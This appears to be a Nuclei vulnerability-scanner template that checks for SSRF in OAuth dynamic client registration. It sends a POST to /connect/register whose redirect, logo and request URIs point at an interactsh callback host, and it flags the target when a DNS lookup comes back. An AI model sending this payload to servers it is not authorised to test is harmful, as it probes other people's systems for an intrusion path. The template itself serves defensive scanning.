nuclei-templates/http/misconfiguration/ssrf-via-oauth-misconfig.yaml

36 lines
1.1 KiB
YAML
Raw Normal View History

2023-03-31 11:42:54 +00:00
id: ssrf-via-oauth-misconfig
info:
name: SSRF due to misconfiguration in OAuth
author: KabirSuda
severity: medium
description: Sends a POST request with the endpoint "/connect/register" to check external Interaction with multiple POST parameters.
reference:
- https://portswigger.net/research/hidden-oauth-attack-vectors
tags: misconfig,oast,oauth,ssrf
metadata:
max-request: 1
http:
- raw:
- |
POST /connect/register HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Accept-Language: en-US,en;q=0.9
{
"application_type": "web",
"redirect_uris": ["https://{{interactsh-url}}/callback"],
"client_name": "{{Hostname}}",
"logo_uri": "https://{{interactsh-url}}/favicon.ico",
"subject_type": "pairwise",
"token_endpoint_auth_method": "client_secret_basic",
"request_uris": ["https://{{interactsh-url}}"]
}
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
2023-03-31 11:42:54 +00:00
- "dns"